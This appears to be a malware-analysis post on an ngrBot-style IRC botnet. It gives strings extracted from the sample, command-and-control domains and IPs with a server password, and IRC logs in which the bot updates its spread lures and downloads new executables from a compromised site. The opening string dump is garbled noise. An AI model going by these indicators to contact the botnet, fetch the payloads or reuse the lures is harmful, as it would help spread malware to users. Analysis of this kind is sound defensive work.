4 4$4(4,4044484<4@4D4H4L4P4T4X44`4d4h4l4p4t4x4|4
5 5$5(5,5054585<5@5D5H5L5P5T5X55`5d5h5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6L6P6T6X66`6d6h6l6p6t6x6|6
7 7$7(7,7074787<7@7D7H7L7P7T7X77`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8L8P8T8X88`8d8h8l8p8t8x8|8
8 9,989D9P99h9x9|9
: :(:,:0:8:<:@:X:`:d:h:l:p:x:|:
; ;$;(;,;0;8;<;@;D;H;P;T;X;;`;h;l;p;t;x;
< <(<,<0<4<8<@<D<H<L<P<X<<`<d<h<p<t<|<
=(=0=8=@=H=T==d=l=
Unicode Strings:
---------------------------------------------------------------------------
Ajjj
jjjj
jjjj
jjjj
$jjj
Ajjj
DBWIN
.pipe
kernel32.dll
ntdll.dll
Internet Exploreriexplore.exe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.ex
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
HKCU
HKLM
Microsoft Unified Security Protocol Provider
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
POST
.exe
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%SDesktop.ini
winlogon.exe
explorer.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
dnsapi.dll
Akernel23.dll
y%s%s.exe
lsass.exe
Shell
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun
we have 2 new domains here
rlz01jm.info not active yet
rlz1lola.info active
lalorlz1.info this is old domain allready posted in my blog
Resolved : [rlz1lola.info] To [176.9.192.215]
176.9.192.216 5236 PASS ROCKR Botnet server here
176.9.192.215 5236 PASS ROCKR Botnet server here
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “mira este videito de jlo desnuda http://www.endenter.com/IMG00359268.JPG pufff mamacita |”
PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira este videito de jlo desnuda http://www.endenter.com/IMG00359268.JPG pufff mamacita”
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – Redirected 16 domain(s)
PRIVMSG #ROCK :[d=”http://www.endenter.com/wp-includes/css/update/30upjmrlzz.exe” s=”116236 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0
NICK n{US|XPa}eovvenu
USER eovvenu 0 0 :eovvenu
JOIN #ROCK ngrBot
JOIN #rockspread
JOIN #US
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to “4”
PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to “4”
Now talking in #ROCK
Topic On: [ #ROCK ] [ ,up http://www.endenter.com/wp-includes/css/update/31upjmrlzz.exe 9702091B21C1A48955A5268D07E31EF6 | ,mdns http://www.endenter.com/wp-includes/css/update/dos.txt ]
Topic By: [ rockstar ]
Download samples here and here
Download
hosting infos
http://whois.domaintools.com/176.9.192.215